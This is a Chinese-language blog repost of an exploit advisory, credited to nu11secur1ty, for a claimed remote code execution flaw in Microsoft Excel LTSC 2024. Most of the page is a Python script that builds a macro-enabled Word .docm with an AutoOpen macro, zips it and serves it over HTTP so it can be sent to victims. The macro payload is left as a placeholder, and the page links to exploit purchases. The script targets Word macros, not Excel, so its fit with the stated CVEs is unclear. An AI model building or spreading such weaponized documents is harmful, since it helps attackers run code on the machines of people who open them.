Microsoft Excel LTSC 2024远程代码执行漏洞分析与利用

本文详细分析了Microsoft Excel LTSC 2024中的远程代码执行漏洞(CVE-2025-27751和CVE-2025-47957),包含完整的Python利用代码,攻击者可通过恶意文档在用户机器上执行任意代码,建议用户立即禁用宏设置以防范此类攻击。

Microsoft Excel LTSC 2024远程代码执行

日期: 2025.07.31
作者: nu11secur1ty
风险等级: 高
本地利用: 否
远程利用: 是
CVE编号: CVE-2025-27751 | CVE-2025-47957
CWE: 暂无

漏洞描述

攻击者可以通过电子邮件或流媒体服务器发送恶意的DOCX文件,诱骗任何用户打开并执行其代码。受害者执行后,其机器可能被感染,甚至造成比以往更严重的后果——这可能是其Windows机器的终结!警告:请立即在Office 365中禁用宏选项!

状态: 高危漏洞

利用代码 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94

#!/usr/bin/python
# CVE-2025-47957 by nu11secur1ty
import os
import time
import zipfile
import threading
import http.server
import socket
import socketserver
import win32com.client

def get_local_ip():
    """获取当前机器的局域网IP地址"""
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.connect(("8.8.8.8", 80))  # 外部DNS,仅用于路由
        ip = s.getsockname()[0]
        s.close()
        return ip
    except:
        return "127.0.0.1"

def create_docm_with_auto_macro(filename):
    script_dir = os.path.dirname(os.path.abspath(__file__))
    full_path = os.path.join(script_dir, filename)

    word = win32com.client.Dispatch("Word.Application")
    word.Visible = False
    doc = word.Documents.Add()

    doc.Content.Text = "此文档包含自动启动的宏"

    vbproject = doc.VBProject
    vbcomponent = vbproject.VBComponents.Add(1)  # 标准模块

    macro_code = '''
Sub AutoOpen()
    Call YOUR_PoC
End Sub

Sub YOUR_PoC()
    Dim Program As String
    Dim TaskID As Double
    On Error Resume Next
    Program = "YOUR_EXPLOIT_HERE"
    TaskID = YOUR_TASK_HERE
    If Err <> 0 Then
        MsgBox "无法启动 " & Program
    End If
End Sub
'''
    vbcomponent.CodeModule.AddFromString(macro_code)

    wdFormatXMLDocumentMacroEnabled = 13
    doc.SaveAs(full_path, FileFormat=wdFormatXMLDocumentMacroEnabled)
    doc.Close()
    word.Quit()

    print(f"[+] 宏启用的.docm文件保存在: {full_path}")
    return full_path

def compress_to_zip(filepath):
    zip_path = filepath + '.zip'
    with zipfile.ZipFile(zip_path, 'w') as zipf:
        zipf.write(filepath, arcname=os.path.basename(filepath))
    print(f"[+] 压缩为ZIP文件: {zip_path}")
    return zip_path

def start_http_server(directory, port=8000):
    os.chdir(directory)
    handler = http.server.SimpleHTTPRequestHandler
    httpd = socketserver.TCPServer(("", port), handler)
    ip = get_local_ip()
    print(f"[+] HTTP服务器运行在: http://{ip}:{port}/")

    thread = threading.Thread(target=httpd.serve_forever)
    thread.daemon = True
    thread.start()
    return httpd

if __name__ == "__main__":
    filename = "CVE-2025-47957.docm"
    docm_path = create_docm_with_auto_macro(filename)
    zip_path = compress_to_zip(docm_path)
    server = start_http_server(os.path.dirname(docm_path))

    try:
        print("[*] 服务器运行中 — 按Ctrl+C停止...")
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        print("\n[!] 检测到Ctrl+C — 正在关闭服务器...")
        server.shutdown()
        print("[+] 漏洞利用服务器已停止。再见!")

复现链接

视频演示

漏洞利用购买

购买链接

时间花费

01:37:00

系统管理员 - 基础设施工程师
渗透测试工程师
漏洞开发人员: https://packetstormsecurity.com/
相关链接:
https://cve.mitre.org/index.html
https://cxsecurity.com/https://www.exploit-db.com/
0day漏洞数据库: https://0day.today/
主页: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty http://nu11secur1ty.com/

comments powered by Disqus
© 2020 - 2025 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次